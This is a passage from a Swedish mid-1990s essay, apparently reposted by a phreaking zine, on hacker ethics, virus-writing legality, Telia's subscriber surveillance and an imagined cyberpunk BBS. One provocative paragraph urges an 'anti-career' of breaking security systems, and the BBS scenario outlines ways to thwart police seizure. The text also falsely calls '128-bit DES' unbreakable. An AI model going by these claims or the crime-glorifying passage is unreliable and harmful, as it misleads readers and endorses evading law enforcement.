nyproduktionen. Får jag inte framställa ett datavirus och infektera min egen
dator med det om jag känner för det? Det verkar konstigt, tycker jag. Till
saken hör att man kan skapa ett datavirus på papper med hjälp av en vanlig
blyertspenna om man vill. Det är först när man matar in viruset i en dator och
sprider det, som det kan göra skada.
_Storebror:_* Vad skall du göra virus för? Det kommer inget gott ur det. Låt
bli det. Låt bli det säger jag. Varför skall du skriva dikter? Vad skall det
vara bra för? Låt bli. Gå till fabriken och jobba istället. Gör nytta säger
jag.*
Däremot kan jag hålla med om att avsiktligt spridande av datavirus bör
kriminaliseras. Debatten har varit uppe i USA, där bland annat den namnbekante
virusbekämparen _Alan Solomon_ (känd som _Dr Solomon_) klart och tydligt
deklarerade att han ansåg att ett förbud mot virustillverkning hotade
individens fri- och rättigheter. Vidare kan ett virus inte riktigt jämföras
med en bomb, eftersom en isolerad dator med ett virus på inte kan sägas utgöra
någon allmän fara. I synnerhet inte om användaren vet vad han/hon håller på
med, vilket man får anta att en virustillverkare gör. Dessutom består ett
virus inte av något påtagligt som kemikalier eller metall, utan av ren
information. Ett datavirus *kan* konstrueras som en serie nedskrivna kommandon
på papper, det är bara olika former av samma information. Ett virus på papper
skulle alltså vara lagligt eftersom det råder tryckfrihet här i landet, medan
ett körbart virus skulle vara förbjudet eftersom det inte råder
informationsfrihet? Är inte det samma sak?
Vår moderna trojanska häst i form av datavirus drabbas sannolikt av samma
öde som _Karl Gerhards_ revy *Den ökända hästen från Troja*, som snabbt och
effektivt förbjöds eftersom den kritiserade nazisternas infiltration av
Sverige under 1940-talet. Oönskad konst bör icke framföras (i nationens
intresse) och du vet inte alls bäst själv vad du vill göra med din dator.
(OBS! Sarkasm ;-)
_Datainspektionen och Integriteten_
Den yttersta fronten mot datorbrottslighet i Sverige utgörs av
*Datainspektionen*. Denna myndighet skall framför allt kontrollera att
statliga myndigheter och företag följer _Datalagen_, som upprättats speciellt
för att skydda individen mot ett totalitärt datasamhälle. Både Datalagen och
Datainspektionen tillkom 1973 som en produkt av en allmän internationell
debatt med ursprunget i San Francisco. Det var i samband med folk- och
bostadsräkningen 1970 då samtliga uppgifter för första gången registrerades
med hjälp av datorer som många började dra paralleller till _George Orwells_
*1984* och väckte en debatt om integritetsfrågorna. Man menade att
myndigheterna till viss del samlade på sig uppgifter man inte hade någon som
helst nytta av, och som skulle kunna användas att kontrollera medborgaren i
minsta detalj.
En tongivande filosof som ännu tycks ha stort inflytande över
datainspektionen är förre chefen _Jan Freese_. I praktiken verkar det som om
mycket av vad Jan säger eller skriver anammas av Datainspektionen utan vidare
diskussion. Det gör dock inte så mycket eftersom karln är ganska vettig. Han
har lagt fram flera kloka förslag på nya datalagar och avsevärt förberett det
svenska samhället på informationsrevolutionen. Speciellt vettigt är förslaget
om en *generell integritetslag* som skall gälla personregister och intrång i
privatlivet oavsett om datorer och elektronik är inblandade eller inte. Lagen
borde enligt Freese reglera (citat ur Datateknik Nr 8/1995):
** Tillträde till och genomsökande av privata lokaler*
** Kroppsundersökning, medicinska undersökningar och psykologiska test*
** Skuggning / Spionage*
** Olovlig fotografering / Inspelning*
** Elektronisk avlyssning*
** Spridande av förtroliga uppgifter*
** Avslöjande av annans privata förhållanden*
** Utnyttjande av annans namn, bild o dyl*
** Missbruk av annans ord och meddelanden*
Och det är väl ungefär den här sortens registrering som EFF, Cypherpunkare m
fl motarbetar. Skillnaden i cypherpunkarnas fall är att de menar att regimen
(i USA alltså) fullständigt misslyckats med att upprätthålla individens
integritet. Ja, de menar rent av att regimen inte kan hantera dessa
möjligheter utan att bli maktgalen och vilja kontrollera allt. *Därför* bör
individen skydda sig själv med kryptografi, anonymitetsbarriärer etc. Man ser
här tydligt det libertarianisktiska arvet från de amerikanska nybyggarna som
var tvungna att skydda sina hus och gårdar med egna vapen då rättvisan ännu
inte fungerade. Den tiden ligger så långt tillbaka i den svenska historien att
den nästan blir främmande för oss. Vi är vana att lita på att myndigheterna
fixar allt.
Att alltfler människor beväpnar sig med kryptering beror till stor del på
att den elektoniska parallellvärlden, telerymden, är barbarisk och
ociviliserad, och att även myndighetspersoner tycks handla instinktivt och
nyckfullt i stället för lagenligt när de kommer i kontakt med datorer. Hade en
integritetsskyddslag som den Freese föreslår funnits tidigare hade problemet
varit ur världen.
*Men notera följande*: datainspektionen lyder under regeringen. Om
regeringen får för sig att registrera alla oliktänkande kan inte
datainspektionen göra ett smack åt det, även om det står i datalagen att
regeringen bör inhämta synpunkter från datainspektionen innan den upprättar
något register på eget bevåg. Datainspektionen är *inte på något vis* ett
skydd mot ett totalitärt kontrollsamhälle! Bara den som blint litar på
myndigheter och regeringar skulle våga luta sig tillbaka på datainspektionen.
_Från Hackande till Databrott_
Kan då hackande leda till grövre brottslighet? Svaret är utan tvekan JA.
Hackargängen har även de sin dos av psykopater och hugade följeslagare. Redan
social ingenjörskonst måste betraktas som ett grovt avsteg från samhällets
normer. Det *är* oärligt att lura människor, och att betrakta människan i
andra änden av telefonlinjen som ett objekt snarare än en människa av kött och
blod är skrämmande känslokallt. En del phreakare som konstruerat blå lådor har
slagit mynt av verksamheten och sålt apparaterna för uppemot 1500 dollar, och
det har sannerligen inga ideologiska orsaker.
Phreakare försvarar sina brott på klassiskt vis: för det första drabbas i
första hand stora företag. Kontokortssvindlerier mot privatpersoner brukar i
regel täckas upp av företagen som upplåter korten. Samtidigt bortser man glatt
från det faktum att man ställer till ett helvetes elände för de privatpersoner
som måste bevisa för kontokortsföretagen att de inte själva utnyttjat korten.
Elittänkandet är här allt som oftast förvrängt en ursäkt att göra vad som
helst. Samtidigt skall det påpekas att såväl kontokortsföretag som media
överdriver de följder som drabbar innehavarna av missbrukade kontokort. Även
utredare på kontokortsföretag kan tänka och begriper i allmänhet att en
välutbildad tvåbarnspappa inte ringer upprepade konferenssamtal över halva
jordklotet för skojs skull. Många utredningar avskrivs på ett tidigt stadium.
För det andra påpekar man gärna det faktum att man inte *tjänar* någonting
på att hacka. Hackare har gjort sig kända för att göra inbrott på telefonbolag
och *enbart* stjäla manualer. Man låter bli pengar och maskiner, eftersom man
bara är ute efter information. Sådant sätter givetvis myror i huvudet på
åklagare. En hackare stämmer inte in på vår stereotypa bild av en brottsling
som tillskansar sig andra människors egendom för egen ekonomisk vinning. För
en informationslysten hackare är det själva brottet *i sig* som utgör
vinningen, vilket kan tyckas lite egendomligt.
Att tillverka ett datavirus, eller att spraya graffitti på en cementvägg -
det tjänar man inget på. Möjligen är det sabotage eller vandalism, men någon
ligabrottslighet är det inte frågan om. Kanske är virustillverkning rent av,
likt graffitti, att betrakta som en oönskad konstform; en produkt av vår tid
där allt konstnärligt skall vara sanktionerat och planerat och spontaniteten
så gott som fullständigt utplånats.
Att hacka ett nätverk handlar mer om att *utforska *systemet än att
*stjäla* systemtid. I vissa länder, som Kanada, är det tillåtet att gå in i en
annan människas hus, se sig omkring, och sedan gå därifrån, så länge man inte
skadar något. Ur etisk synvinkel är det här ett knivigt problem. I Holland var
det fram till 1987 fullständigt lagligt att ta sig in i en dator så länge man
inte förstörde eller ändrade någonting.
För det tredje försvarar man sina handlingar ideologiskt - man beskriver
då gärna samhället som allmänt ruttet och menar att de riktiga bovarna är de
stora företagen och valutahandlarna som med sina spekulationer manipulerar
hela mänskligheten att springa deras ärenden. Parallellen till
cyberpunkideologin är uppenbar. Dessa påståenden är utan tvekan till viss del
sanna. Motpolen är det etablerade samhällets skönhet så som _Oscar Wilde_ en
gång uttryckte den:
*Det är bättre att leva orätt än att leva utan rättvisa.*
Det går alltså bra att tala och teoretisera om att göra samhället
rättvist, medan de direkta aktionerna bör betraktas som olagliga i samhällets
mening. Det är samma princip som gäller alla andra utomparlamentariska
aktioner - sedan må det röra sig om hackare, trädkramare eller plogbillar.
Bryter man mot lagen begår man brott. Punkt.
Själv tycker jag absolut att både hackare och cyberpunkare som bryter mot
lagen, såväl som trädkramare, plogbillar eller abortmotståndare som slår
sönder abortkliniker, som ju *alla* har ideologiska skäl till sina handlingar,
*skall* dömas och sättas i fängelse också, om samhället anser att det är
nödvändigt. Det är inte samhällets uppgift att avgöra vilka värderingar som
gör en utomparlamentarisk aktion befogad eller inte. Detta ställningstagande
från min sida beror å andra sidan på att jag är utpräglad parlamentarist och
tror på människans möjlighetet att uppnå resultat i en representativ
demokrati. Med anarkistiska värderingar blir slutsatsen snarast att det inte
borde finnas några lagar alls. (Vilket *jag* inte riktigt ställer upp på.) Det
hela är en fråga om värderingar, och i vårt samhälle av idag betraktas
utomparlamentariska aktioner som brottsliga. Drabbar de privatpersoner är de
felriktade.
Det har spekulerats om att hackare skulle kunna bilda hela underjordiska
syndikat och samarbeta med maffian. Detta är än så länge bara spekulationer.
Får jag säga något själv skulle jag vilja påstå att hackarens mentalitet inte
fungerar riktigt i organiserad brottslighet. Hackaren drar sig genast tillbaka
när han/hon känner sig fysiskt hotad och skiljs från den skyddade tillvaron
bakom skärmen. Detta beror inte på att hon eller han skulle vara *feg* utan på
att det hela bara är "på kul".
Många hackare får underliga erbjudanden som *"du som är så teknisk, skulle
inte du kunna bygga en piratdekoder..."*, *"kan du inte.. (ditt och datt)"*.
Faktum är, att även om hackarna definitivt *kan* göra detta, är det ytterst
sällan de gör det. Hackare är nämligen antiauktoritära och avskyr att
kommenderas. *"Lär dig själv!"* brukar vara det vanligaste svaret. Hackare
vill inte ha någon underordnad roll som tekniksnille i någon brottslig
organisation. Varför skulle han? Han kan tjäna betydligt mer pengar på ett
*lågavlönat* datajobb än någon brottslig organisation kan erbjuda, möjligen
med undantag av maffian och främmande underrättelsetjänster. Råd, tips och
idéer står de däremot gärna till tjänst med: *"Har du kört fast?"*, *"Har du
hittat något intressant?"*, men uppdrag av ekonomiska skäl och inte av vanlig
upptäckarlusta? Glöm det.
Till och med tycker jag att vi skall vara tacksamma att det var de små
ettriga hackarna som upptäckte säkerhetsbristerna i datorsystemen istället för
*de stora hajarna*. I phreakarnas guldålder på 70-talet fanns det en del stora
spelsyndikat som utnyttjade de blå lådorna som ibland tillverkades nästan
industriellt och såldes för hutlösa priser. Om detta må man sedan ha vilken
åsikt som helst, men ingen kan förneka att det hackarna gjort har varit
*viktigt* för industrin, även om det inte alltid varit *bra.* (Annars skulle
det nog inte vara så populärt att prata om dem.)
När Marvin i Uppsala tillverkar egna telefonkort och säljer dem för mellan
100 och 800 kronor är det knappast att betrakta som industriell framställning
eller ens som verksamhet för egen vinning. Med tanke på den enkla utrustning
som användes och den tid som lades ned på konstruktion liknar det närmast
brakförlust. Det tycks då snarare vara något ideologiskt som ligger bakom
konstruktionen av telefonkorten. Frihet åt informationen? Anarki?
Personligen måste jag säga att de "hårdvaru-virus" i form av en liten
elektronisk mackapär som kallas *Big Red* och som hittats i en del amerikanska
och australiensiska bankdatorer är mycket mer skrämmande än någonting *någon*
hackare *någonsin* åstadkommit. Detta föremål kopierar, krypterar och gömmer
viktig information på en dators hårddisk så att den som vet hur man skall gå
till väga lätt kan komma åt den. Big Red kan mycket väl vara konstruerat av
maffian eller någon internationell underrättelsetjänst. Dessa måste ha
monterats målmedvetet från *insidan* av ett företag, till skillnad från
hackarens utforskande som sker utifrån och av ren nyfikenhet.
Fortfarande i juli 1995 huserade en ovanligt sofistikerad datorliga i
Sverige. De gick in i kontor och stal enbart datorer, inte skärmar och
tangentbord (dessa klipptes loss), utan bara datorer. På en del äldre modeller
tog man enbart minneskretsar och hårddiskar. För att kunna arbeta ostört hade
man klippt av televerkets larmkablar genom att öppna luckor i gatan på samma
manér som hackarna i filmen *Sneakers*. Man kommunicerade internt via
komradio, och polisen lyckades till och med banda tjuvarnas kommunikation.
Ändå lyckades man inte ta dem.
Det är ingen tvekan om varifrån dessa tjuvar kommer. En del av dem är
definitivt hackare av något slag, andra mer härdade tekniska brottslingar.
Likheten med Gibsons romanfigurer är slående: man tar bara verktyg för
informationshantering, minnen är guld värda och den tekniska skickligheten hos
tjuvarna är fantastisk. Jag tänker inte för en sekund förneka att dessa tjuvar
lärt sig mycket av den teknik de använder vid sina stölder från olika
hackartidskrifter: Rolig Teknik, Phrack, alla möjliga böcker från små obskyra
bokförlag. (Plus vanlig studentlitteratur, helt säkert.) Men det är faktiskt
inte det som är problemet.
Problemet är *vi*. Problemet är att vi tittar på filmer som Sneakers,
Jönssonligan, Enkelstöten osv, där vi får chansen att mysa åt bilden av den
romantiske eller rolige brottslingen, trots att det är denna vi fördömer som
samhällets fiende och allt ont förtjänande avskum. Brottslingen, eller i det
här fallet den *tekniskt avancerade brottslingen*, behöver vi för att veta att
det fortfarande går att gå runt alla elektroniska säkerhetssystem. För kan vi
inte komma undan den tekniska bevakningen, ja då *kan* vi inte vara
ohederliga, och då är det inte längre något fritt val att vara hederlig. Det
finns ingen antikarriär som vi kan se ned på i vår strävan att ständigt dundra
upp i den sociala hierarkin. Det finns ingen heder som vi kan bevara, för om
ingen någonsin är ohederlig vet man inte vad det innebär att vara hederlig.
Brottsligheten finns som en motor som driver oss att vara skötsamma, varnar
oss om vi kommer i närheten av kanten, och får oss att känna oss nöja med våra
lyckade liv. Vi springer ju trots allt inte omkring och klipper av larmkablar
och snor datorer om nätterna, eller hur? Vi jobbar ju på dagarna och *sover*
på nätterna. Var natt behöver sin dag. Var samhälles ljusa laglydiga sida
behöver sin ljusskygga underjordiska rörelse.
Vi ger våra genier två karriärer. Antingen skall de genom en nioårig
skola, ett treårigt gymnasium och en högskolekarriär för att kunna bli
civilingenjörer och ständigt fortsätta sina karriärer uppåt eller åt sidan i
jakten på *mer* status, *mer* pengar, och *mer* spännande arbetsuppgifter.
(Tänk, en dag kan man ju bli chef... Jag måste läsa lite ekonomi också...
Umgås i rätt kretsar, dryfta rätt åsikter...)
Men om man inte tycker om skolan? Om den hiskeligt långa utbildningen
tråkar ut dig, men ditt intresse fortfarande glöder för elektroniska
mackapärer och datorer? Inget problem. Samhället har något för dig också:
*tvåårigt* gymnasium, *ingen* status, *inga* pengar, och *inga *spännande
arbetsuppgifter som PLEX-programmering eller styrsystemskonstruktion. Du får
aldrig gå i de rätta skolorna, lära känna rätt människor eller läsa de rätta
böckerna. Du får inte det rätta sociala arvet. *Detta trots att du kanske i
själva verket är händig och lättlärd och passar bättre på Ericssons
utvecklingsavdelning än någon annan!* Anställningsförfarandet på
högteknologiföretagen är smakfullt anpassat att förpassa personer med tvåårig
utbildning ner i kryptan igen.
Återstår: antikarriär. Utnyttja dina kunskaper till att bryta ned
samhällets säkerhetssystem så att de stackars medborgarna ser att det inte är
bombsäkert. Ge dem något att kämpa och leva för. Ge dem ett yttre hot så att
de slipper vända blicken inåt. Var laglös för att sätta ramarna för de
laglydiga. Tro inte att brott inte lönar sig - det gör de ibland. Bara några
stycken då och då åker fast så att de goda männsikorna får något ont att
bespotta.
Kära läsare - era brottslingar är de djävlar ni speglar er i för att se
ängeln inom er själva. Ta mig fan om de är ett dugg sämre än er!
_Det Stora Företagets Säkerhetsstyrkor_
Ett av de mest otrevliga databrott jag har hört talas om begicks (och
begås kanske fortfarande) av _Telia_. I april 1995 avslöjade den elektroniska
tidningen Z central, en underavdelning till Z-mag@zine att Telia hade en egen
enhet för nätövervakning som systematiskt samlade in information om abonnenter
som de misstänkte vara phreakare eller hackare. Genom att använda
telefonväxlarnas datorer kunde man lätt katalogisera vilka som ringde vilka
samtal och vart. Det verkar rent av som om Telia systematiskt spårade och
iakttog vissa hackare, något som egentligen bara Polisen har rätt att göra. De
förde sedan dessa uppgifter vidare till andra företag som de misstänkte blev
utnyttjade av dessa hackare.
Detta är förbjudet enligt 4:e paragrafen i datalagen som innebär att man
inte får registrera uppgifter om brottsmisstankar mm utan datainspektionens
tillstånd. Sådana tillstånd ges i princip aldrig - detta för att undvika
totalitära samhällsmaskinerier.
Det skall tilläggas att denna debatt om Telias trafikavläsningar inte är
någon nyhet. Redan 1981 skaffade man sig en elektronisk trafikavläsare med
namnet _TAL-T M80_ som kunde registrera all trafik på en viss linje, varefter
informationen sändes till en central dator där den lagrades. Sedan dess har
Telia infört denna övervakning på så gott som varenda telefon i hela Sverige,
eftersom funktionen för trafikövervakning finns inbyggd i varje AXE-växel. I
själva verket registreras allt någon gör på sin telefon av AXE-växeln. Om du
lyfter luren, trycker *en* siffra och lägger på igen, registreras detta med
klockslag och tryckt siffra i en dator. Telia kan sedan ta fram en komplett
lista på alla telefonsamtal och icke-telefonsamtal som gjorts - allt som hänt
på linjen. Uppgifterna skall enligt Telia användas för utvärdering och
förbättring av befintliga system, för att lösa tvister med abonnenter osv.
Uppgifterna lagras på magnetband i c:a 6 månader.
Att Telia inte kan låta bli att registrera och analysera sin verksamhet
förstår var och en som jobbat inom ett större företag. Men att föra uppgifter
om detta vidare är förbjudet enligt såväl tele- som datalagen. Telia hade i
och för sig gott uppsåt i att "hjälpa" de drabbade företagen, men det ursäktar
inte att man gör något sådant här. Jag har även sett indikationer på att Telia
använder sina datalistor till både det ena och det andra inom bolaget. När de
själva drabbas av hackare av något slag utnyttjas informationen hänsynslöst av
Telias säkerhetsavdelningar för att pressa hackare på uppgifter om hur
intrången begåtts. (Telias egna datorer lider i många fall av undermålig
säkerhet.) Detta trots att dessa uppgifter inte ens får lämnas ut till
Polisen...
För att göra bekämpandet av telebrottslighet än mer effektivt har man
börjat undersöka möjligheterna att konstruera ett sk *expertsystem*, en
artificiellt intelligent agent som skall analysera de databand där alla
svenska telefonsamtal registreras i jakten på *beteendemönster* som verkar
suspekta; exempelvis personer som ringer många och långa samtal utan
mellanrum, ringer många 020-nummer osv osv, så att man kan bygga upp en
databas med "misstänkta" abbonenter. Man får hoppas att Telia i så fall inte
tänker använda systemet eftersom detta innebär fullständigt olaglig hantering
av dataregister. Men vad gör man inte för att upprätthålla säkerheten...
Telia får stå som exempel på hur storföretagen ser på databrott. Av de
angrepp som sker mot Telias tekniska anläggningar utgörs 87% av stöld och
skadegörelse, medan manipulation av tekniska system och intrång utgör drygt
10%. I den sistnämnda kategorin ingår phreakare och hackare, men även en stor
del andra som inte har något som helst med denna underjordiska rörelse att
göra. (*Men*, eftersom hackarna har en gemensam kultur och etik är de såklart
alltid lättast att sätta fingret på och fördöma.)
Telia är dessutom ett företag som lider av en närmast paranoid rädsla för
att någon skall förstå sig på deras system. Det gör alla telebolag. Eftersom
det tekniska skyddet på Telias växlar inte är tillräckligt lutar man sig
tillbaka på ett *psykologiskt skydd*, som helt enkelt innebär att man håller
inne med information så att en tänkt angripare inte kan veta något om hur
systemen fungerar. På samma sätt skyddar man sin egen organisation, sina egna
interna telefonnummer etc. Till och med inom organisationen skyddar man sig.
Man ser noga till att inte sprida onödigt mycket kunskap bland operatörer som
inte behöver den för att sköta sitt arbete. Någon helhetssyn på systemen finns
inte annat än hos chefer och mycket högt uppsatta ingenjörer och
systemutvecklare. Enda vägen dit är via internutbildning. Kunskap om Telias
system skall alltså bara finnas på insidan av organisationen, ingen utanför
Telia skall få veta något om hur kopplingarna verkligen fungerar. *Bort med
tassarna*, till skillnad från "hands-on" alltså. Du skall bara använda
systemet. Försök inte ta reda på hur det fungerar, inte ens om du är
intresserad. Granska inte, rota inte bland kablarna, bara *ring*, *betala* och
*var nöjd!*
Den direkta orsaken till att Telia skaffat sig en egen
säkerhetsorganisation är att Polisen varken har tid eller råd att reda ut
Telias problem. (Som jag nämnde tidigare rotar man ogärna i bedrägerier för
mindre än 50.000 kr.) Telia har själva uppgett att bolaget har behov av c:a 30
säkerhetschefer plus ett 10-tal specialister inom områdena fysiskt säkerhet,
systemteknisk säkerhet, ADB-säkerhet, sekretess och informationsskydd. Den
sistnämnda kategorin är den som skall se till att bland andra jag inte får
veta det som stod i föregående mening. (Dessa siffror härhör sig dock från
tiden då Telia fortfarande hette Televerket och därmed var tvungna att lämna
ut uppgifter till allmänheten tack vare offentlighetsprincipen.) Förmodligen
har cheferna för informationsskydd numera en väl strukturerad organisation som
ser till att information som betraktas som farlig inte lämnar företaget eller
hamnar i offentliga arkiv.
En annan sak som man skall ha fullständigt klart för sig är att
storföretag som Telia inte har råd med moral. När man väl har kartlagt de
bedrägerier som drabbar företaget måste man först avgöra om det lönar sig att
jaga bedragare och förbättra säkerhetsrutinerna innan man verkligen gör det.
Om man förlorar kunder på att förbättra säkerheten så att rutinerna blir för
krångliga för de legitima användarna, låter man hellre hackarna hållas. Detta
har fått en del hackare att höja på ögonbrynen och undra om teleföretagen är
snälla, dumma eller bara korkade. I själva verket tänker de bara på pengar.
Det är därför det fortfarande är så lätt att ringa på falska kontokortsnummer
- det kostar helt enkelt för mycket att åtgärda problemet.
Låt mig nu dra en liten parallell. När jag pratade om cyberpunk nämnde jag
att William Gibson med flera skildrar en framtid där all ekonomi och
utveckling sköts av storföretag med benhård hierarkisk organisation och en
vanvettigt hög arbetsmoral. I utvecklingslaboratorierna spottas nya tekniska
innovationer fram av uttråkade ingenjörer med ett finger konstant på
snabbspolningsknappen. Allt i dessa företags organisation syftar till att få
alla människor som ingår i hierarkin att känna sig så viktiga som möjligt, så
att de jobbar så effektivt som möjligt och tvingar de som finns under dem att
jobba än hårdare. Resultatet blir en fruktansvärt effektiv, men samtidigt
vanvettigt psykopatisk organisation som kan driva samhällsutvecklingen över
vilka gränser som helst.
De hackare som tvingats till Telias regionskontor som informatörer har med
skräckblandad förtjusning beskrivit den rigorösa säkerheten. De har passerat
flera dörrar, alla med blinkande lysdioder och med krav passerkort för att
hindra fel människa att vara på fel plats vid fel tillfälle. Längst upp i
byggnaden sitter de högsta cheferna, bakom sammanlagt kanske fem dörrar som
alla fordrar passerkoder. Hierarkierna fordrar att kontorsrummen blir allt
större ju högre upp man kommer. På översta våningen är de rejält vräkiga. Det
är hit upp alla i huset strävar att komma. De som finns på nedersta våningen i
detta babels torn kan inte ens komma igenom hälften av dörrarna till översta
våningen. På det viset upprätthålls viljan att ständigt klättra uppåt mot
toppen.
Hit kallas hackaren. Mannen på andra sidan bordet är inte elak. Han är
inte omänsklig, psykopatisk eller enbart grym. Han är nitiskt. Han tror på de
tio våningar betong som hackaren just slussats upp igenom. Han har i hela sitt
liv, ända sedan han kom ut från universitetet, varit en del av denna hierarki.
Eftersom han är chef har han varit bland dem som visat störst lojalitet,
trohet mot bolaget och hela det samhällssystem det är en produkt av. Han kan
inte för sitt liv föreställa sig att något av detta skulle kunna bygga på ett
felaktigt antagande. Att det skulle vara något fel på det marknadsekonomiska
system vari han själv bara är ett litet, litet kugghjul. Någonstans inom sig
upprätthåller han en liten illusion om frihet och oberoende som han vårdar
ömt.
Han har all respekt för hackaren. 20-åringen på andra sidan bordet
lyckades ju ta sig igenom allt han byggt upp. Och han gjorde det inte med våld
- han gjorde det med sin intelligens. Han manipulerade Telias datorer. Han
tänke ett steg längre än Telias egen säkerhetspersonal. Chefen är imponerad.
Men samtidigt vet han, med grund i sina värderingar av det vackra samhälle där
han kan leva i en flådig enplansvilla med hemmafru, två barn och två bilar,
att den där grabben har fel. Grabben är en brottsling och skall behandlas som
en brottsling. Han vet att han har att göra med en farlig person. Hackarmyten
om den kallblodiga, anarkistiska antagonisten har han svalt med hull och hår.
Det är *han*, säkerhetschefen, som har rätt. Betongen, skrivbordet, villan,
marknaden, skolan... Allt detta har han i ryggen. Det är klart att han har
rätt. Hur skulle saker och ting annars fungera?
Givetvis måste han få veta hur det gick till. Eftersom han vet att han har
rätt kan han ta till alla medel som står till buds. I betongsalarna i
Göteborg, Farsta och Kalmar står hans trogna tjänare - _IBM 3081 D, AS/9000,
Sperry 1100/92_ - datorer som lyder hans minsta vink. Redan innan hackaren
kallades till kontoret lät han dra ut listor på alla de samtal denne gjort
under det senaste halvåret. Exakt, med tidsangivelser på sekunder. *Så han
ringde sin flickvän mitt i natten direkt efter ett tvåtimmars samtal på ett
020-nummer i USA? Varför då? Är hon också inblandad?* Det kommer att bli ett
långt förhör. Hackaren på andra sidan bordet vet inte att listan som Telias
säkerhetschef snart skall sticka under näsan på honom är fullständigt värdelös
ur juridisk synvinkel. Ingenting är bevittnat eller undertecknat; bara 5
samtal har spårats. Dessa 5 samtal utgör den enda bindande bevisningen.
Hackaren med sin tråkiga medelklassbakgrund tittar rakt över bordet och in
i den imponerade chefens ögon. Han skådar Gibsons psykopatiska Tessier-Ashpool
koncern i vitögat. Han ser det enorma företagets pulserande hjärna sitta där i
Lacoste-tröja och vit skjorta. Frågan är om han förstår det.
_BBS:en som Försvann_
Vi tänker oss att en grupp cyberpunkare i en nära framtid sätter upp en
BBS med namnet *Pheliks *för informationsspridning på en större persondator
med ett flertal ingående telefonlinjer. På denna BBS finns piratkopierad
programvara, narkotikarecept, anarkistiska elektroniska pamfletter, ingående
beskrivningar av Telias AXE-växlar, dokumentation på smarta kreditkort och
lite annat smått och gott. Programvaruindustrin med Microsoft i spetsen är
förbannade. Kreditinstituten med Visa och Eurocard är förbannade. Polisen som
vill upprätthålla ordningen ser att detta bryter mot lagen och måste göra
något.
Cyberpunkarna är dessvärre medvetna om polisens och myndigheternas
tänkbara motåtgärder och har därför vidtagit kontraåtgärder. När myndigheter
ringer upp BBS:en möts de av meddelandet:
_Pheliks BBS öppen dygnet runt på 28.800 bps._
_OBSERVERA: Pheliks BBS är öppen för amatörer. Poliser, journalister, forskare
och andra myndighetspersoner, såväl som företagare eller företrädare för
idéella organisationer som ringer i tjänsten är INTE VÄLKOMMNA. Om du tillhör
någon av dessa kategorier ber vi dig vänligt men bestämt att omedelbart
avsluta förbindelsen med Pheliks BBS. Tryck ENTER för att bekräfta att du inte
tillhör någon av ovanstående kategorier. Tryck +++ath0 för att avsluta
förbindelsen._
Genom detta meddelande aktiveras 21 paragrafen i datalagen med resultat att
den som inte följer uppmaningen gör sig skyldig till databrott. På detta vis
omöjliggörs varje form av elektronisk husrannsakan och BBS:en hotas inte av
myndigheter eller forskningsinstitut som måste hålla sig inom lagens råmärken.
*Journalisterna* skulle i ett sådant fall kunna åberopa sin morliska rätt
att som tredje statsmakt bryta mot datalagen i allmänhetens intresse.
Mjukvaruföretagen i form av Business Software Alliance skulle dessutom med
högsta sannolikhet ge höga fan i datalagen och trots detta meddelande gå
vidare. Efter ett avslöjande i tidningar eller upprepade anonyma tips (läs:
lobbying) indirekt från BSA, kombinerat med någon slags spaningsresultat som
skulle kunna tolkas som att det även fanns t ex narkotika i den lokal BBS:en
finns, skulle polisen trots allt kunna slå till mot denna BBS.
Cyberpunkarna har dock förutsett även detta scenario. När polisen kommer
tillbaka till polisstationen med datorn märker de att den del av hårddisken
som innehåller BBS-informationen krypterats med programmet *Securedrive*.
Detta program använder 128-bitars DES-kryptering som är känd för att vara
oknäckbar. Att kryptera sin hårddisk är inte förbjudet - företagare gör det
också för att skydda hemlig information mot stöld, och till skillnad från
vanliga lås kan DES inte forceras med våld. I samma ögonblick som polisen
stängde av datorn blev den alltså i praktiken värdelös som bevismaterial. Av
utredningstekniska skäl kan polisen i och för sig behålla datorn det närmaste
århundradet och på så vis hejda att den misstänkta verksamheten fortsätter.
Datorer är dessvärre inte så dyra. Redan innan utredningen har startat på
allvar har de välorganiserade cyberpunkarna hämtat en ny dator och återställt
hela BBS:en med hjälp av de magnetband som förvarades på ett helt annat ställe
än datorn. Samma metod används av företagen för att skydda värdefull
information från brand, stöld eller maskinhaveri.
Polisen kan då, om det anses finnas skäl, installera
övervakningsutrustning och avlyssna datatrafiken till och från BBS:en,
videofilma cyberpunkarna medan de slår in passerkoderna osv, så att de sedan
kan göra ett lyckat tillslag. Men detta är dyrt och det skall mycket till för
sådana åtgärder. Det är också troligt att mjukvaruföretagen vidtar
utomparlamentariska åtgärder. Kanske hyr de in en samurajhackare som likt
datorcowboyen Case i Gibsons romaner på företagens uppdrag går in i BBS:en via
telenätet och förstör den. Kanske lyckas något företag övertyga Telia om att
stänga av telefonlinjerna till BBS:en. På det viset kan det etablerade
samhället försvara sig mot cyberpunkarna och upprätthålla de ideal som hotats.
Det verkliga faran börjar när alltför många sådana cyberpunkgrupper
uppstår, när de gömmer sig för myndigheterna och företagen eller bildar en
bred organiserad bas i hela landet. Det värsta som kan hända är om BBS:en
flyttar till okänd adress på Internet, eventuellt i Taiwan eller Chile. Har
man råd med datorhyran på andra sidan jordklotet (vilket förmodligen är
billigare än att ha en egen dator) är det inga problem att upprätthålla en
sådan verksamhet från Sverige. Det är då cyberpunkarna kan gå från
informationssyndikat till bred, underjordisk politisk rörelse. Och det är det
verkliga hotet mot det etablerade samhället. Om det är något hot mot samhället
i bred historisk mening är mera tveksamt. Jag skall återkomma till detta.
publicering.
//Linus Walleij
.----------------------------------------------------------------------------.
Phreak 020 - Http://come.to/phreak020 - Joina Mailinglistan!
#Phreak020 på DALnet och EFnet //Celsius
Artiklar sändes till celsius@mindless.com
Tack Till VSU, VSP, KBB och 020 för inspiration!
'----------------------------------------------------------------------------'